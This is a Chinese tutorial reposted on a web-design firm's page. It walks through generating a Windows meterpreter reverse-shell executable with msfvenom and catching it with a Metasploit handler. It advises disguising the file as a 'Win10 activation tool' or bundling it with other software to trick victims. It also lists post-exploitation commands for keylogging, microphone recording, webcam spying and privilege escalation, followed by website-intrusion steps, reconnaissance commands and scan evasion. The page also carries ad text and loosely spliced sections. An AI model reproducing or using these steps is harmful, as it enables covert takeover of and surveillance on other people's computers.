Kali利用msf滲透Windows電腦（超詳細(xì)）

前言

滑縣網(wǎng)站制作公司哪家好，找創(chuàng)新互聯(lián)建站！從網(wǎng)頁設(shè)計(jì)、網(wǎng)站建設(shè)、微信開發(fā)、APP開發(fā)、成都響應(yīng)式網(wǎng)站建設(shè)公司等網(wǎng)站項(xiàng)目制作，到程序開發(fā)，運(yùn)營維護(hù)。創(chuàng)新互聯(lián)建站于2013年成立到現(xiàn)在10年的時(shí)間，我們擁有了豐富的建站經(jīng)驗(yàn)和運(yùn)維經(jīng)驗(yàn)，來保證我們的工作的順利進(jìn)行。專注于網(wǎng)站建設(shè)就選創(chuàng)新互聯(lián)建站。

最近整理了一些 奇安信華為深信服大佬 的課件資料+大廠面試課題，想要的可以私信自取， 無償贈(zèng)送 給粉絲朋友~

msfvenom a Metasploit standalone payload generator，Also a replacement for msfpayload and msfencode.是用來生成后門的軟件。

MSFvenom是Msfpayload和Msfencode的組合，將這兩個(gè)工具都放在一個(gè)Framework實(shí)例中。自2015年6月8日起，msfvenom替換了msfpayload和msfencode。

演示環(huán)境

使用Kali 2021.3進(jìn)行演示操作

目標(biāo)靶機(jī)： Win10專業(yè)版

軟件：msfvenom、msfconsole（Kali系統(tǒng)內(nèi)置）

1.進(jìn)入管理員模式

命令： sudo su

解釋： 不在管理員模式下運(yùn)行可能會(huì)有權(quán)限不夠的提示，為了避免命令執(zhí)行失敗，在管理員下運(yùn)行以下命令

命令： msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口號 –f exe –o 文件名.exe

解釋： 本地ip寫自己Kali的IP地址，用ifconfig就能查看自己Kali的IP地址

本地端口自己隨便設(shè)置一個(gè)沒有被占用的端口號，如果端口號被占用那么文件會(huì)生成失敗，換一個(gè)端口號就性

文件名可以隨便寫自己喜歡的名字，比如寫Win10激活工具，可能更容易讓目標(biāo)主機(jī)上鉤

當(dāng)然MSF也可以用來滲透手機(jī)、mac、Linux等

接下來運(yùn)行命令生成文件

默認(rèn)生成的文件在根目錄下

把剛才生成的文件放到目標(biāo)靶機(jī)Win10系統(tǒng)中

命令： msfconsole

(1)命令： use exploit/multi/handler（選擇模塊）

(2)命令： set payload windows/meterpreter/reverse_tcp（選擇攻擊模塊）

(3)命令： set LhOST 192.168.32.1（填寫自己主機(jī)的IP地址）

(4)命令： set lport 1111（填寫剛才生成文件時(shí)的端口號）

(5)命令： show options（查看設(shè)置參數(shù)）

(6)命令： exploit -z -j（后臺(tái)執(zhí)行）

我們這里也可以把這個(gè)程序偽裝一下，把他的圖標(biāo)改一下，或者把它捆綁在某些軟件上面，當(dāng)用戶打開就自動(dòng)安裝到對方電腦上面

(1)命令： sessions （查看上鉤的用戶）

(2)命令： sessions -i 1 （選擇需要攻擊的用戶，這里選擇第 1 個(gè)

命令： run vnc -i

cmd指令:

cat 讀取文件內(nèi)容到屏幕

cd 更改目錄

checksum 檢索文件的校驗(yàn)和

cp 將源復(fù)制到目標(biāo)

del 刪除指定文件

dir 列出文件（ls 的別名）

下載 下載文件或目錄

編輯 編輯文件

getlwd 打印本地工作目錄

getwd 打印工作目錄

lcd 更改本地工作目錄

lls 列出本地文件

lpwd 打印本地工作目錄

ls 列出文件

mkdir 創(chuàng)建目錄

mv 將源移動(dòng)到目標(biāo)

pwd 打印工作目錄

rm 刪除指定文件

rmdir 刪除目錄

search 搜索文件

show_mount 列出所有掛載點(diǎn)/邏輯驅(qū)動(dòng)器

upload 上傳文件或目錄

pkill 按名稱終止進(jìn)程

keyscan_start 開始捕獲擊鍵（開始鍵盤記錄）

keyscan_dump 轉(zhuǎn)儲(chǔ)按鍵緩沖（下載鍵盤記錄）

keyscan_stop 停止捕獲擊鍵（停止鍵盤記錄）

record_mic X秒從默認(rèn)的麥克風(fēng)record_mic音頻記錄（音頻錄制）

webcam_chat 開始視頻聊天（視頻，對方會(huì)有彈窗）

webcam_list 單攝像頭（查看攝像頭列表）

webcam_snap 采取快照從指定的攝像頭（攝像頭拍攝一張照片）

webcam_stream 播放視頻流從指定的攝像頭（開啟攝像頭監(jiān)控）

enumdesktops 列出所有可訪問的桌面和窗口站（窗體列表）

getdesktop 得到當(dāng)前的Meterpreter桌面

reboot 重新啟動(dòng)遠(yuǎn)程計(jì)算機(jī)

shutdown 關(guān)閉遠(yuǎn)程計(jì)算機(jī)

shell 放入系統(tǒng)命令 shell

enumdesktops 列出所有可訪問的桌面和窗口站

getdesktop 獲取當(dāng)前的meterpreter桌面

idletime 返回遠(yuǎn)程用戶空閑的秒數(shù)

keyboard_send 發(fā)送擊鍵

keyevent 發(fā)送按鍵事件

keyscan_dump 轉(zhuǎn)儲(chǔ)擊鍵緩沖區(qū)

keyscan_start 開始捕獲擊鍵

keyscan_stop 停止捕獲擊鍵

mouse 發(fā)送鼠標(biāo)事件

screenshare 實(shí)時(shí)觀看遠(yuǎn)程用戶桌面

screenshot 抓取交互式桌面的屏幕截圖

setdesktop 更改 Meterpreters 當(dāng)前桌面

uictl 控制一些用戶界面組件

record_mic 從默認(rèn)麥克風(fēng)錄制音頻 X 秒

webcam_chat 開始視頻聊天

webcam_list 列出網(wǎng)絡(luò)攝像頭

webcam_snap 從指定的網(wǎng)絡(luò)攝像頭拍攝快照

webcam_stream 播放來自指定網(wǎng)絡(luò)攝像頭的視頻流

play 在目標(biāo)系統(tǒng)上播放波形音頻文件 (.wav)

getsystem 嘗試將您的權(quán)限提升到本地系統(tǒng)的權(quán)限

execute -f notepad 打開記事本

————————————————

原文鏈接：

滲透最好的方法

滲透網(wǎng)站方法步驟一：需要能夠?qū)π畔⑦M(jìn)行網(wǎng)絡(luò)掃描收集。該方法步驟為如何滲透一個(gè)網(wǎng)站的準(zhǔn)備環(huán)節(jié)步驟，大家需要能夠打開相關(guān)的DOS窗口，接著進(jìn)行使用ping來獲取滲透網(wǎng)站的相關(guān)真實(shí)IP地址，這樣就能輕松知道其滲透的網(wǎng)站是否有無丟包率，延遲時(shí)間往往需要為49；大家需要注意的是使用ping命令一方面就是為了能夠進(jìn)行獲取IP地址，另外一方面就是想通過延遲時(shí)間來進(jìn)行知道網(wǎng)絡(luò)速度的快慢，這樣才能便于后期對網(wǎng)站服務(wù)器口令的檢測。

滲透網(wǎng)站方法步驟二：進(jìn)行初步來獲取滲透網(wǎng)站相關(guān)端口開放情況。當(dāng)以上步驟完成后，還需要能夠獲取端口相關(guān)開放的情況，建議大家可以使用漏洞掃描系統(tǒng)sfind命令來進(jìn)行獲取滲透網(wǎng)站服務(wù)器的端口開放情況，通常服務(wù)器的開放端口包括有3389和21.80等；在完成這步的時(shí)候也包括一些操作技巧，

如：1、當(dāng)發(fā)現(xiàn)滲透網(wǎng)站3389端口開放，該端口就為遠(yuǎn)程終端服務(wù)開放端口，大家從這些就應(yīng)該能夠斷定出windows系列主機(jī)；

2、大家也可以使用3389遠(yuǎn)程終端連接器連接到滲透網(wǎng)站的IP地址中進(jìn)行嘗試直接登錄，當(dāng)進(jìn)行登錄成功就可以看到滲透網(wǎng)站操作系統(tǒng)是windows2000 server還是windows2003 server了，便于進(jìn)一步的滲透；

3、大家能夠使用superscan以及x-scan等專業(yè)掃描軟件來對端口進(jìn)行掃描以便為進(jìn)一步ssl漏洞滲透作準(zhǔn)備，只不過提醒大家x-scan掃描軟件的個(gè)頭比較大，甚至整個(gè)掃描的操作會(huì)相對復(fù)雜些，但是整個(gè)掃描結(jié)果卻是比較全面的。

滲透網(wǎng)站方法步驟三：大家需要通過webshell進(jìn)行查看文件。這個(gè)步驟也是如何滲透一個(gè)網(wǎng)站最關(guān)鍵的步驟，可以直接在webshell中輸入密碼后進(jìn)行單擊登陸按鈕，當(dāng)驗(yàn)證進(jìn)行通過后就能正常使用這種webshell了，一般通過這步就能查看到滲透網(wǎng)站上所有文件了。

滲透網(wǎng)站方法步驟四：再通過serv-u進(jìn)行提升權(quán)限。很多時(shí)候大家在webshell中進(jìn)行單擊serv-u提升權(quán)限功能，也就能直接進(jìn)行權(quán)限提升的操作界面中，在操作界面中就能進(jìn)行權(quán)限提升操作了。

滲透網(wǎng)站方法步驟五：進(jìn)行打開遠(yuǎn)程終端服務(wù)器，輸入獲取的用戶名和密碼。這是如何滲透一個(gè)網(wǎng)站最后一步，當(dāng)成功進(jìn)行登錄后就表現(xiàn)整個(gè)滲透已經(jīng)成功。

滲透測試之操作系統(tǒng)識(shí)別

利用TTL起始值判斷操作系統(tǒng),不同類型的操作系統(tǒng)都有默認(rèn)的TTL值(簡陋掃描,僅作參考)

TTL起始值:Windows xp(及在此版本之前的windows)? 128 (廣域網(wǎng)中TTL為65-128)

Linux/Unix64(廣域網(wǎng)中TTL為1-64)

某些Unix:255

網(wǎng)關(guān):255

使用python腳本進(jìn)行TTL其實(shí)質(zhì)判斷

使用nmap識(shí)別操作系統(tǒng):nmap -O 192.168.45.129 #參數(shù)-O表示掃描操作系統(tǒng)信息,nmap基于簽名,指紋,特征,CPE編號等方法去判斷目標(biāo)系統(tǒng)的信息

CPE:國際標(biāo)準(zhǔn)化組織,制定了一套標(biāo)準(zhǔn),將各種設(shè)備,操作系統(tǒng)等進(jìn)行CPE編號,通過編號可以查詢到目標(biāo)系統(tǒng)

使用xprobe2進(jìn)行操作系統(tǒng)識(shí)別,專門用來識(shí)別目標(biāo)操作系統(tǒng):xprobe2 192.168.45.129,但結(jié)果并不是很精確

被動(dòng)操作系統(tǒng)識(shí)別:不主動(dòng)向目標(biāo)主機(jī)發(fā)數(shù)據(jù)包,基于網(wǎng)絡(luò)監(jiān)聽原理

通過抓包分析,被動(dòng)掃描,使用kali中的p0f工具進(jìn)行網(wǎng)絡(luò)監(jiān)聽

p0f:p0f是一種被動(dòng)指紋識(shí)別工具，可以識(shí)別您連接的機(jī)器，連接到您的盒子的機(jī)器，甚至連接在盒子附近的機(jī)器，即使該設(shè)備位于數(shù)據(jù)包防火墻后面。

p0f的使用:只要接收到數(shù)據(jù)包就可以根據(jù)數(shù)據(jù)包判斷其信息,首先輸入p0f,然后在瀏覽器里面輸入目標(biāo)系統(tǒng)的網(wǎng)址,便會(huì)獲得目標(biāo)系統(tǒng)的信息

或者使用p0f結(jié)合ARP地址欺騙識(shí)別全網(wǎng)OS

snmp掃描:簡單網(wǎng)絡(luò)管理協(xié)議,明文傳輸,使用網(wǎng)絡(luò)嗅探也可獲取到信息

SNMP是英文"Simple Network Management Protocol"的縮寫，中文意思是"簡單網(wǎng)絡(luò)管理協(xié)議"。SNMP是一種簡單網(wǎng)絡(luò)管理協(xié)議，它屬于TCP/IP五層協(xié)議中的應(yīng)用層協(xié)議，用于網(wǎng)絡(luò)管理的協(xié)議。SNMP主要用于網(wǎng)絡(luò)設(shè)備的管理。由于SNMP協(xié)議簡單可靠 ，受到了眾多廠商的歡迎，成為了目前最為廣泛的網(wǎng)管協(xié)議。

snmp的基本思想是為不同種類、不同廠家、不同型號的設(shè)備定義一個(gè)統(tǒng)一的接口和協(xié)議，使管理員可以通過統(tǒng)一的外觀面對這些需要管理的網(wǎng)管設(shè)備進(jìn)行管理，提高網(wǎng)管管理的效率，簡化網(wǎng)絡(luò)管理員的工作。snmp設(shè)計(jì)在TCP/IP協(xié)議族上，基于TCP/IP協(xié)議工作，對網(wǎng)絡(luò)中支持snmp協(xié)議的設(shè)備進(jìn)行管理。

在具體實(shí)現(xiàn)上，SNMP為管理員提供了一個(gè)網(wǎng)管平臺(tái)(NMS)，又稱為管理站，負(fù)責(zé)網(wǎng)管命令的發(fā)出、數(shù)據(jù)存儲(chǔ)、及數(shù)據(jù)分析。被監(jiān)管的設(shè)備上運(yùn)行一個(gè)SNMP代理(Agent))，代理實(shí)現(xiàn)設(shè)備與管理站的SNMP通信。如下圖

管理站與代理端通過MIB進(jìn)行接口統(tǒng)一，MIB定義了設(shè)備中的被管理對象。管理站和代理都實(shí)現(xiàn)了相應(yīng)的MIB對象，使得雙方可以識(shí)別對方的數(shù)據(jù)，實(shí)現(xiàn)通信。管理站向代理申請MIB中定義的數(shù)據(jù)，代理識(shí)別后，將管理設(shè)備提供的相關(guān)狀態(tài)或參數(shù)等數(shù)據(jù)轉(zhuǎn)換為MIB定義的格式，應(yīng)答給管理站，完成一次管理操作。

已有的設(shè)備，只要新加一個(gè)SNMP模塊就可以實(shí)現(xiàn)網(wǎng)絡(luò)支持。舊的帶擴(kuò)展槽的設(shè)備，只要插入SNMP模塊插卡即可支持網(wǎng)絡(luò)管理。網(wǎng)絡(luò)上的許多設(shè)備，路由器、交換機(jī)等，都可以通過添加一個(gè)SNMP網(wǎng)管模塊而增加網(wǎng)管功能。服務(wù)器可以通過運(yùn)行一個(gè)網(wǎng)管進(jìn)程實(shí)現(xiàn)。其他服務(wù)級的產(chǎn)品也可以通過網(wǎng)管模塊實(shí)現(xiàn)網(wǎng)絡(luò)管理，如Oracle、WebLogic都有SNMP進(jìn)程，運(yùn)行后就可以通過管理站對這些系統(tǒng)級服務(wù)進(jìn)行管理。

使用UDP161端口(服務(wù)端),162端口(客戶端),可以監(jiān)控網(wǎng)絡(luò)交換機(jī),防火墻,服務(wù)器等設(shè)備

可以查看到很多的信息,但經(jīng)常會(huì)被錯(cuò)誤配置,snmp里面

有一些默認(rèn)的Community,分別是Public/private/manager

如果目標(biāo)的community是public,那么就可以發(fā)送SNMP的查詢指令,對IP地址進(jìn)行查詢

在kali中存在對snmp掃描的工具,為onesixtyone

在Windows XP系統(tǒng)安裝SNMP協(xié)議:

1,在運(yùn)行框輸入appwiz.cpl

2,找到管理和監(jiān)控工具,雙擊

3,兩個(gè)都勾選,然后點(diǎn)OK

使用onesixtyone對目標(biāo)系統(tǒng)進(jìn)行查詢:命令為:onesixtyone 192.168.45.132? public

onesixtyone -c? 字典文件? -I? 主機(jī)? -o 倒入到的文件 -w 100

onesixtyone默認(rèn)的字典在:/usr/share/doc/onesixtyone/dict.txt

使用snmpwalk查找目標(biāo)系統(tǒng)的SNMP信息:snmpwalk 192.168.45.129 -c public -b 2c

snmpcheck -t? 192.168.45.129

snmpcheck -t? 192.168.45.129 -w? 參數(shù)-w檢測是不是有可寫權(quán)限

SMB協(xié)議掃描:server message block,微軟歷史上出現(xiàn)安全問題最多的協(xié)議,在Windows系統(tǒng)上默認(rèn)開發(fā),實(shí)現(xiàn)文件共享

在Windows系統(tǒng)下管理員的Sid=500,

SMB掃描:nmap -v -p 139,445 192.168.45.132 --open 參數(shù)-v表示顯示詳細(xì)信息,參數(shù)--open表示顯示打開的端口

nmap 192.168.45.132 -p 139,445 --script=smb-os-discovery.nse

smb-os-discovery.nse:這個(gè)腳本會(huì)基于SMB協(xié)議去判別操作系統(tǒng),主機(jī)名,域名,工作組和當(dāng)前的時(shí)間

nmap -v -P 139,445 --script=smb-check-vulns? --script-args=unsafe=1 192.168.45.132

腳本smb-check-vulns:檢查已知的SMB重大的漏洞

后面給腳本定義參數(shù) --script-args=unsafe=1,unsafe可能會(huì)對系統(tǒng)有傷害,導(dǎo)致宕機(jī),但要比safe準(zhǔn)確

nbtscan -r 192.168.45.0/24參數(shù)-r使用本地137端口進(jìn)行掃描,兼容性較好,可以掃描一些老版本的Windows

nbtscan可以掃描同一局域網(wǎng)不同的網(wǎng)段,對于局域網(wǎng)掃描大有裨益

enum4linux -a 192.168.45.132 :

SMTP掃描:目的在于發(fā)現(xiàn)目標(biāo)系統(tǒng)的郵件賬號

使用nc -nv 192.168.45.132 25

VRFY root :確定是不是有root用戶

nmap掃描SMTP服務(wù):

nmap smtp.163.com -p25 --script=smtp-enum-users.nse --script-args=smtp-enum-

users.methods={VRFY}

腳本smtp-enum-users.nse用于發(fā)現(xiàn)遠(yuǎn)程系統(tǒng)上所有user的賬戶

nmap smtp.163.com -p25 --script=smtp-open-relay.nse,如果郵件服務(wù)器打開了open-relay功能,那么黑客可以拿管理員的郵箱去發(fā)送釣魚郵件

防火墻識(shí)別:通過檢查回包,可能識(shí)別端口是否經(jīng)過防火墻過濾

設(shè)備多種多樣,結(jié)果存在一定的誤差

第一種情況:攻擊機(jī)向防火墻發(fā)送SYN數(shù)據(jù)包,防火墻沒有給攻擊機(jī)回復(fù),攻擊機(jī)再發(fā)送ACK數(shù)據(jù)包,若防火墻返回RST數(shù)據(jù)包,那么證明該端口被防火墻過濾

第二種類似

第三種:攻擊機(jī)向防火墻發(fā)送SYN數(shù)據(jù)包,防火墻返回SYN+ACK或者SYN+RST數(shù)據(jù)包,攻擊者再發(fā)送ACK數(shù)據(jù)包,若防火墻返回RST數(shù)據(jù)包,那么就可以證明防火墻對于該端口沒被過濾.unfiltered=open

第四種情況類似,證明該端口是關(guān)閉的,或者防火墻不允許其他用戶訪問該端口

使用python腳本去判定:

使用nmap去進(jìn)行防火墻識(shí)別:nmap有系列防火墻過濾檢測功能

nmap -sA 192.168.45.129 -p 22 參數(shù)-sA表示向目標(biāo)主機(jī)發(fā)送ACK數(shù)據(jù)包,參數(shù)-sS表示向目標(biāo)發(fā)送SYN數(shù)據(jù)包,通過抓包分析收到的數(shù)據(jù)包判斷是否有防火墻檢測功能

負(fù)載均衡識(shí)別:負(fù)載均衡可以跟為廣域網(wǎng)負(fù)載均衡和服務(wù)器負(fù)載均衡

在kali中使用lbd命令用于識(shí)別負(fù)載均衡機(jī)制

格式:lbd +域名/IP地址,如lbd

WAF識(shí)別:WEB應(yīng)用防火墻,在kali中最常用的waf檢測掃描器

輸入:wafw00f -l:可以檢測出這個(gè)工具可以檢測到的waf類別

探測微軟公司的WAF:wafw00f?

使用nmap中的腳本去掃描目標(biāo)網(wǎng)站使用的waf信息:nmap? ? --script=http-waf-detect.nse

腳本詳情:

nmap補(bǔ)充:

參數(shù):-iL:把IP地址做成文件,使用該參數(shù)掃描這個(gè)文件里面的IP! nmap -iL ip.txt

-iR:隨機(jī)選取目標(biāo)進(jìn)行掃描,后面跟需要掃描的主機(jī)個(gè)數(shù),例:nmap -iR? 20? -p 22:隨機(jī)掃描20個(gè)主機(jī)的22號端口,默認(rèn)發(fā)送SYN數(shù)據(jù)包

參數(shù)-sn表示不做端口掃描

參數(shù)-Pn表示跳過主機(jī)發(fā)現(xiàn),掃描所有在線的主機(jī),掃防火墻幫助很大

參數(shù)p0表示進(jìn)行IP協(xié)議ping

參數(shù)-n/-R表示不進(jìn)行DNS解析

參數(shù)--dns-servers表示指定一個(gè)DNS服務(wù)器去解析

參數(shù)--traceroute表示進(jìn)行路由追蹤

參數(shù)-sM表示發(fā)送ACK+FIN

參數(shù)-sF發(fā)送FIN數(shù)據(jù)包

參數(shù)-sV根據(jù)特征庫匹配開放的服務(wù),加上參數(shù)--version-intensity 后面加等級,0最小,9最完善

參數(shù)--script=腳本名

參數(shù)--script=arge.腳本.腳本名

參數(shù)--script-updatedb更新腳本

參數(shù)--script-help=腳本名? 查看腳本的信息

參數(shù)-O檢測操作系統(tǒng)類型

參數(shù)--scan-delay 表示每次探測間隔多長時(shí)間,后面?zhèn)€時(shí)間,如nmap 192.168.45.132 --scan-delay 10s :間隔十秒

參數(shù)-f表示設(shè)置MTU最大傳輸單元

參數(shù)-D表示偽造源地址,增加一些虛假的掃描IP,例:nmap? -D 192.138.1.1,192.151.141.4? 172.16.45.1? :掃描172.16.45.1主機(jī),用這兩個(gè)地址做干擾,防止被發(fā)現(xiàn)

參數(shù)-S表示偽造源地址,但要獲取得到的IP地址,那么就得登陸到偽造的IP上

參數(shù)--proxies指定代理服務(wù)器

參數(shù)--spoof-mac欺騙mac地址 nmap 10.1.1.1? --spoof-mac=00:11:22:33:44:55

參數(shù)-6表示掃描IPv6

文章標(biāo)題：滲透windows系統(tǒng)的簡單介紹
瀏覽地址：http://chinadenli.net/article4/hppiie.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供、商城網(wǎng)站、做網(wǎng)站、面包屑導(dǎo)航、服務(wù)器托管、定制網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)